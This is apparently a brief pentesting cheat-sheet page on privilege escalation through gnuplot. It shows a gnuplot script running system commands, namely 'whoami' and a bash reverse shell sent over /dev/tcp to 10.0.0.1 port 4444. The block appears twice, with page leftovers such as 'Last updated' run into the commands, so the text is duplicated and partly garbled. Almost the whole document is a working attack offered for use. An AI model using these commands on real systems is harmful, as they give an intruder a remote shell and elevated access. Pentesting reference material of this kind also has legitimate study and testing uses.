Gnuplot Privilege Escalation
Command Execution
gnuplot test.pltsystem "whoami"
# Reverse shell
system "bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"References
Last updated
gnuplot test.pltsystem "whoami"
# Reverse shell
system "bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"Last updated